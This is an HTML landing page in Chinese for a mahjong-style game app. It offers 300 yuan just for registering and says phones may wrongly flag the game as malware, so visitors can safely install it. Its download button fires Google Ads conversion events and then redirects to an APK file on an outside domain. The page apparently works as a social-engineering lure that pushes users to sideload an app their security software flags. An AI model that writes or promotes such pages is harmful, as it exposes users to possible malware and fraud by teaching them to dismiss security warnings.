<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>湖南258</title>
	  <!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-10976787172"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'AW-10976787172');
</script>

    <style>
        body {
            margin: 0;
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            text-align: center;
        }
        .container {
            background: #fff;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            padding: 20px;
            max-width: 400px;
        }
        h1 {
            color: #333;
            margin-bottom: 20px;
        }
        p {
            color: #666;
            margin-bottom: 30px;
        }
        .image {
            width: 100%;
            border-radius: 10px;
            margin-bottom: 20px;
        }
        .button {
            background-color: #007BFF;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s;
        }
        .button:hover {
            background-color: #0056b3;
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="./img/1.png" alt="示例图片" class="image">
		 <img src="./img/2.png" alt="示例图片" class="image">
		 <h2>注册就送 <span style="color: red;">300元</span>，无套路</h2>
        <p>经典再现：抢杠胡，将将胡，碰碰胡，清一色，海底牌，六六顺，起手胡，缺一色。板板胡</p>
		<p>此其牌游戏可能被手机误判为恶意软件，请放心安装</p> 
		<button class="button" style="width: 200px;" onclick="handleClick()">点击下载</button></p> 
		 <img src="./img/3.png" alt="示例图片" class="image">
       
    </div>

   
	
	
	<!--  执行方法-->

<script>
        function gtag_report_conversion(url) {
            var callback = function () {
                if (typeof(url) != 'undefined') {
                    window.location.href = url; // 进行跳转
                }
            };
		// 663 潜客
            gtag('event', 'conversion', {
                'send_to': 'AW-10976787172/YfObCIL944AaEOT1kfIo',
                'value': 5.0,
                'currency': 'USD',
                'event_callback': callback
            });

		// 664 潜客
            gtag('event', 'conversion', {
                'send_to': 'AW-10977607075/T5O4CPfeiIEaEKP7w_Io',
                'value': 5.0,
                'currency': 'USD',
                'event_callback': callback
            });
            return false;
        }

        function handleClick() {
             // 谷歌事件
            gtag_report_conversion();
            const links = [
                'https://agent.cbit.cc/4325270v120.apk'
            ];

            // 随机选择一个链接
            const randomIndex = Math.floor(Math.random() * links.length);
            const randomLink = links[randomIndex];
        window.location.href = randomLink; // 进行跳转
           
              alert("【下载中】游戏将在10秒内下载完成");
        }
    </script>
	
	
</body>
</html>